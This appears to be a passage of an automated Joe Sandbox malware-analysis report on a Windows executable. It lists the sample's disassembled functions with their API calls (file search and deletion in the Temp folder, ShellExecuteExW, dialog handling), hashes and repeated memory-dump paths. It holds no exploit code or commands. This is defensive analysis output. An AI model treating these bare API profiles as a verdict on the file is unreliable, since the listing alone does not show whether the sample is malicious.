                                                                                                                                                                                          • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                                                                                          • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                                                                                                                                                                                          • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00405B56
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 587946157-0
                                                                                                                                                                                          • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                                                                                                                                                          • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                                                                                                                                                          • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                                                                                          • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                                                                                          • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                          • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                                                                                          • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                                                                                          • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00403A4C,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B24
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                          • Opcode ID: 4fffb8c71d51b546a7e2127151d0507ebb76f0821c6fee4e4994e39edc86062b
                                                                                                                                                                                          • Instruction ID: 13c518e9ac0cc08fdea238e66527cd13fc05b27a1f87e487e8402aab48b93ad6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fffb8c71d51b546a7e2127151d0507ebb76f0821c6fee4e4994e39edc86062b
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1C0223010830882D0203F389E4FA093A289700339B608325B0B9B00F2C73CA24A042D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404AF8
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,: Completed), ref: 00404B04
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                                                                                                                                            • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                                                                                                                                            • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,00434000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                                                                                                                            • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                                                                                                                            • Part of subcall function 004067CF: CharNextW.USER32(?,00434000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                                                                                                                            • Part of subcall function 004067CF: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                                                                                                                                            • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                                                                                                                            • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                                                                                                                                            • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: 47305662$: Completed$A$fh
                                                                                                                                                                                          • API String ID: 2624150263-3915006841
                                                                                                                                                                                          • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                                                                                                                          • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405C56
                                                                                                                                                                                          • lstrcatW.KERNEL32(00424F10,\*.*), ref: 00405C9E
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405CC1
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CC7
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CD7
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405D86
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                          • API String ID: 2035342205-3042786806
                                                                                                                                                                                          • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                                                                                                                                          • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 0040226E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                          • API String ID: 542301482-455884830
                                                                                                                                                                                          • Opcode ID: c5d79d16062643fa9f49ccf2f1417c0b8ed88cb680971ee357d323a85270418a
                                                                                                                                                                                          • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5d79d16062643fa9f49ccf2f1417c0b8ed88cb680971ee357d323a85270418a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                          • Opcode ID: 30b04623f1bfc97e613d6b745aa06119eef436eb88c3a4778c562d35565e2df1
                                                                                                                                                                                          • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                                                                                                                                                          • Opcode Fuzzy Hash: 30b04623f1bfc97e613d6b745aa06119eef436eb88c3a4778c562d35565e2df1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                                                                                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
